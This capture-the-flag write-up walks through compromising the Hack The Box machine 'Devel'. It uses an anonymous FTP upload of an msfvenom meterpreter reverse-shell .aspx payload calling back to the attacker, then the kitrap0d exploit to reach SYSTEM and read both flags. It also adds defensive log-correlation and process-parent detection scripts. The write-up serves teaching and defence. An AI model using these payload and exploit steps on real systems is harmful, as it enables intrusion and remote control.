[HTB] Devel

Today we are going to hack the HTB machine called Devel.

Enumeration


To begin, we run an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 10.10.10.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 12:35 CEST
Nmap scan report for 10.10.10.5
Host is up (0.037s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM                  aspnet_client
| 04-05-20  09:33PM                 2854 go.aspx
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.61 seconds
We can connect to the FTP server anonymously, and we see that the FTP content is exactly what the IIS web server serves, so we use msfvenom to generate a meterpreter/reverse_tcp payload as an .aspx file and upload it over FTP.

Exploitation



sml@Cassandra:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=6666 -f aspx -o go.aspx

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2818 bytes
Saved as: go.aspx
We upload our .aspx to the FTP server.

sml@Cassandra:~$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:sml): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put go.aspx
local: go.aspx remote: go.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2854 bytes sent in 0.00 secs (18.5156 MB/s)
ftp>
We set up the handler on our machine and leave it listening.

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.14.19
lhost => 10.10.14.19
msf5 exploit(multi/handler) > set lport 6666
lport => 6666
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.19:6666
We visit http://10.10.10.5/go.aspx to get the shell.

[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.19:6666 -> 10.10.10.5:49196) at 2020-04-02 12:38:29 +0200

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

meterpreter > shell
Process 1280 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
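
The whole foothold above is "anonymous FTP write into the web root, then an HTTP request that makes IIS execute the uploaded file". The following detection script is an added example, not part of the original writeup: it correlates a constructed IIS FTP log with a constructed IIS web log (the W3C field layout is an assumption; the #Fields header drives the parsing) and reports anonymous uploads of script files that are requested afterwards.

```python
"""Correlate an anonymous FTP upload of a server-side script with a later HTTP
request for it, the pattern used against Devel. Added example, not from the
original writeup; the log lines are constructed and the field layout is an
assumption modelled on IIS W3C logs (the real #Fields header drives parsing)."""
import re

# Extensions IIS will execute rather than serve as static content.
SCRIPT_EXT = re.compile(r"\.(aspx?|ashx|asmx|svc)$", re.I)

# Constructed sample of the FTP server's W3C log.
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2020-04-02 10:37:02 10.10.14.19 anonymous PASS *** 230
2020-04-02 10:37:05 10.10.14.19 anonymous STOR /go.aspx 226
2020-04-02 10:40:12 10.10.14.19 anonymous STOR /welcome.png 226"""

# Constructed sample of the web server's W3C log for the same window.
WEB_LOG = """#Fields: date time s-ip cs-method cs-uri-stem c-ip sc-status
2020-04-02 10:37:30 10.10.10.5 GET /iisstart.htm 10.10.14.19 200
2020-04-02 10:38:20 10.10.10.5 GET /go.aspx 10.10.14.19 200"""


def parse_w3c(text):
    """Turn W3C extended log text into dicts keyed by the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows


def find_uploaded_script_hits(ftp_text, web_text):
    """Return (uploader_ip, path, requester_ip) for every anonymous STOR of a
    script file that is requested over HTTP afterwards: upload plus execution
    is remote code execution as the application pool identity."""
    uploads = {}
    for r in parse_w3c(ftp_text):
        if (r["cs-method"] == "STOR" and r["cs-username"].lower() == "anonymous"
                and SCRIPT_EXT.search(r["cs-uri-stem"])):
            uploads[r["cs-uri-stem"]] = r
    hits = []
    for req in parse_w3c(web_text):
        up = uploads.get(req["cs-uri-stem"])
        if up and (req["date"], req["time"]) >= (up["date"], up["time"]):
            hits.append((up["c-ip"], req["cs-uri-stem"], req["c-ip"]))
    return hits


if __name__ == "__main__":
    for src, path, client in find_uploaded_script_hits(FTP_LOG, WEB_LOG):
        print(f"anonymous upload of {path} from {src}, then executed via HTTP by {client}")
```

The fix on the server side is the same check inverted: the anonymous FTP root must not be the IIS content directory, or must at least be read-only.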

Privilege Escalation


Now that we have an open session, we use post/multi/recon/local_exploit_suggester to find an exploit that lets us elevate privileges.

msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 30 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_ The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_ The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
Of all the candidates, we choose ms10_015_kitrap0d.

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 192.168.1.148:4444 
[*] Launching notepad to host the exploit...
[+] Process 620 launched.
[*] Reflectively injecting the exploit DLL into 620...
[*] Injecting exploit into 620 ...
[*] Exploit injected. Injecting payload into 620...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms10_015_kitrap0d) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User             Path
 ---   ----  ----                    ----  -------  ----             ----
 0     0     [System Process]                                        
 4     0     System                                                  
 264   4     smss.exe                                                
 324   488   dllhost.exe                                             
 344   336   csrss.exe                                               
 384   336   wininit.exe                                             
 396   376   csrss.exe                                               
 452   376   winlogon.exe                                            
 488   384   services.exe                                            
 496   384   lsass.exe                                               
 504   384   lsm.exe                                                 
 608   488   svchost.exe                                             
 620   3532  notepad.exe             x86   0                         C:\Windows\system32\notepad.exe
 672   488   svchost.exe                                             
 724   488   svchost.exe                                             
 796   452   LogonUI.exe                                             
 832   488   svchost.exe                                             
 888   488   svchost.exe                                             
 1000  488   svchost.exe                                             
 1092  488   svchost.exe                                             
 1180  488   spoolsv.exe                                             
 1216  488   svchost.exe                                             
 1316  488   svchost.exe                                             
 1384  488   svchost.exe                                             
 1424  488   svchost.exe                                             
 1512  488   VGAuthService.exe                                       
 1520  488   msdtc.exe                                               
 1540  488   vmtoolsd.exe                                            
 1568  488   svchost.exe                                             
 2020  608   WmiPrvSE.exe                                            
 2084  608   WmiPrvSE.exe                                            
 2780  488   sppsvc.exe                                              
 2812  488   svchost.exe                                             
 2892  488   SearchIndexer.exe                                       
 3044  2892  SearchProtocolHost.exe                                  
 3316  488   WmiApSrv.exe                                            
 3532  1568  w3wp.exe                x86   0        IIS APPPOOL\Web  c:\windows\system32\inetsrv\w3wp.exe

meterpreter > migrate 620
[*] Migrating from 3532 to 620...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
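
Note that the kitrap0d handler was started on 192.168.1.148:4444 rather than on the 10.10.14.19 VPN address, which is presumably why no second session came back; the notepad.exe the exploit launched and elevated is still alive, so migrating into it yields SYSTEM. From the defender's side the telling artifact in the ps table above is notepad.exe with w3wp.exe as its parent. The following added script, not part of the original writeup, parses a trimmed copy of that table (embedded as constructed input) and flags every child of the IIS worker process.

```python
"""Flag child processes of the IIS worker (w3wp.exe) in a Meterpreter `ps`
table. Added example, not from the original writeup; the sample below is a
trimmed copy of the table shown above, used here as constructed input."""
import re

WEB_WORKERS = {"w3wp.exe"}  # IIS application pool worker process

PS_OUTPUT = r""" PID   PPID  Name                    Arch  Session  User             Path
 ---   ----  ----                    ----  -------  ----             ----
 0     0     [System Process]
 4     0     System
 488   384   services.exe
 608   488   svchost.exe
 620   3532  notepad.exe             x86   0                         C:\Windows\system32\notepad.exe
 1568  488   svchost.exe
 2020  608   WmiPrvSE.exe
 3532  1568  w3wp.exe                x86   0        IIS APPPOOL\Web  c:\windows\system32\inetsrv\w3wp.exe"""

# pid, ppid and the first token of the name are enough for the parent check.
ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)")


def parse_ps(text):
    """Return {pid: (ppid, name)} from Meterpreter's ps output."""
    procs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            procs[int(m.group(1))] = (int(m.group(2)), m.group(3))
    return procs


def web_worker_children(procs):
    """List (pid, name, ppid) for processes whose parent is a web worker.
    w3wp.exe normally spawns nothing; notepad.exe or cmd.exe under it is the
    signature of code running from the web root (here also kitrap0d's
    notepad host process, which is why it ends up holding a SYSTEM token)."""
    return sorted((pid, name, ppid) for pid, (ppid, name) in procs.items()
                  if ppid in procs and procs[ppid][1].lower() in WEB_WORKERS)


if __name__ == "__main__":
    for pid, name, ppid in web_worker_children(parse_ps(PS_OUTPUT)):
        print(f"suspicious: {name} (pid {pid}) spawned by w3wp.exe (pid {ppid})")
```

The same parent/child rule applied to Sysmon or EDR process-creation events catches this at execution time instead of from a snapshot.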

user.txt



c:\Users>cd babis
c:\Users\babis>dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\babis

17/03/2017  05:17                .
17/03/2017  05:17                ..
17/03/2017  05:17                Contacts
18/03/2017  02:14                Desktop
17/03/2017  05:17                Documents
17/03/2017  05:17                Downloads
17/03/2017  05:17                Favorites
17/03/2017  05:17                Links
17/03/2017  05:17                Music
17/03/2017  05:17                Pictures
17/03/2017  05:17                Saved Games
17/03/2017  05:17                Searches
17/03/2017  05:17                Videos
               0 File(s)              0 bytes
              13 Dir(s)  24.383.025.152 bytes free

c:\Users\babis>cd Desktop
c:\Users\babis\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\babis\Desktop

18/03/2017  02:14                .
18/03/2017  02:14                ..
18/03/2017  02:18                 32 user.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.383.025.152 bytes free

c:\Users\babis\Desktop>type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8

root.txt



c:\Users>cd administrator
c:\Users\Administrator>dir

 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\Administrator

18/03/2017  02:16                .
18/03/2017  02:16                ..
18/03/2017  02:16                Contacts
18/03/2017  02:17                Desktop
18/03/2017  02:16                Documents
18/03/2017  02:16                Downloads
18/03/2017  02:16                Favorites
18/03/2017  02:16                Links
18/03/2017  02:16                Music
18/03/2017  02:16                Pictures
18/03/2017  02:16                Saved Games
18/03/2017  02:16                Searches
18/03/2017  02:16                Videos
               0 File(s)              0 bytes
              13 Dir(s)  24.383.737.856 bytes free

c:\Users\Administrator>cd Desktop
c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\Administrator\Desktop

18/03/2017  02:17                .
18/03/2017  02:17                ..
18/03/2017  02:17                 32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.383.737.856 bytes free

c:\Users\Administrator\Desktop>type root.txt.txt
e621a0b5041708797c4fc4728bc72b4b

End


And with that we have both the "user" flag and the "root" flag.